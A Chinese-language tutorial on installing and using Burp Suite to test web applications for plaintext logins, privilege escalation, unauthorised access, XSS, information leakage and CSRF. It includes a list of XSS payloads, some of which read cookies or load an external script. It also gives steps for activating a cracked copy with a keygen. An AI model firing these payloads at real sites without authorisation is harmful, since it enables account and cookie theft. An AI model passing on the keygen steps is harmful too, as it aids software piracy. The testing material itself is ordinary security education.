Burp Suite
Burp Suite是什么
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。
Burp Suite如何安装
1.先安装JDK1.8版本。安装完成后,在电脑上需要验证Java环境。
2.安装Burp Suite
Burp Suite工具安装下载地址:https://portswigger.net/burp/版本区分为社区版本和职业版本。Burp Suite工具支持不同的操作系统安装(windows/mac os/linux平台等)企业版和专业版需要收费,社区版不用收费 基本功能社区版都配置了
这里找了一个破解版的带汉化安装即可
下载后,首先打开Burpsuite所在文件夹,找到burp-loader-keygen.jar文件,双击打开
设置破解秘钥,如图所示:
将LISENCE中第一个框不发复制粘贴到弹出的框中。然后点击Next,
点击:Manual activatio将弹出的小框中第二栏的内容复制粘贴到之前的第二栏中,则会在其第三栏生成一串条文,最后将这串条文复制粘贴到小框的第二个空格即可。
以后每次使用都是点击burp-loader-keygen.jar文件,双击打开,点击run,就可以打开Burpsuite软件。
3.Burpsuite设置代理
打开Burpsuite点击Next,进入Burp Suite主页面。如图所示:
设置Http代理 拦截请求
这里使用Firefox浏览器进行拦截,首先设置浏览器代理设置,打开firefox浏览器设置->选项->网络设置->手动代理设置如图所示:
打开BurpSuite界面,设置Proxy代理,如图所示:
进入到Intercept页签。如图所示:
Intercept is on 表示开启拦截请求
Intercept is off 表示关闭拦截请求
之后就可以拦截请求了进行抓包了
4.导入证书
点击如图所示按钮访问网站,如图所示:
点击下载证书保存
在火狐浏览器中,设置–>搜索证书–>导入证书(两个信任选项都要勾选)就导入证书了
使用Burpsuite进行各种测试
(1)、明文传输测试
打开proxy代理在登录界面点击登录就可抓到登录名和密码是否为明文登录
(2)、越权漏洞测试
点击修改密码利用proxy代理进行抓包,拿到包数据,把ID进行修改,放包。如果被修改成功即有可能存在漏洞
(3)、未授权访问测试
由于没有对相关敏感页面进行访问权限的检查,导致攻击者可未授权访问,从而获取敏感信息及进行未授权操作等。
通过遍历地址上id的参数值可访问到其他用户的个人信息。
(4)、跨站脚本测试
跨站脚本攻击,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
添加XSS代码
就是对用户输入的特殊字符进行html编码,让浏览器只输出文本内容不做js脚本解析执行,如果执行代码就有XSS漏洞
<a>标签
<a href= https://www.baidu.com/>新闻</a>
<a href=javascript:alert(1)>新闻</a>
<img>标签
<img src=http://pic1.sc.chinaz.com/Files/pic/pic9/202005/apic25412_s.jpg />
<img src=x onerror=alert(1) />
<input>标签
<input type="text" />
<input onmouseover=alert(1) />
payload-有效载荷
<script>alert(1)</script> #最普通的xss
<script>alert(document.cookie)</script> #获取cookie
<a href="javascript:alert('xss')">xss</a> #a链接的xss
<script src='http://baidu.com/xss.js'></script> # 外部攻击代码
<img src=x onerror=alert(1)> #加载图形失败执行
<iframe onload=alert('xss')> #框架
<svg onload=alert(1)>
<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />
<body onload=alert(1)>
<style onload=alert(1)></style>
<input onmouseover=alert(1)>
上面是常用XSS攻击代码
(5)、敏感信息泄露测试
通过特殊的攻击向量,使web服务器出现500、404等相关错误,导致信息泄漏如绝对路径、webserver版本、源代码、sql语句等敏感信息,恶意攻击者很有可能利用这些信息实施进一步的攻击。
使用burpsuite获取数据包,修改realname参数值,系统响应错误,同泄露了系统sql语句信息
(6)、跨站请求伪造测试
跨站脚本伪造是冒充用户在站内的正常操作。通常由于服务端没有对请求头做严格过滤引起的。CSRF会造成密码重置,用户伪造等问题,可能引发严重后果。
将代码保存到本地,登陆另一账户后访问该页面文件,点击发送请求,如果修改成功代码存在漏洞。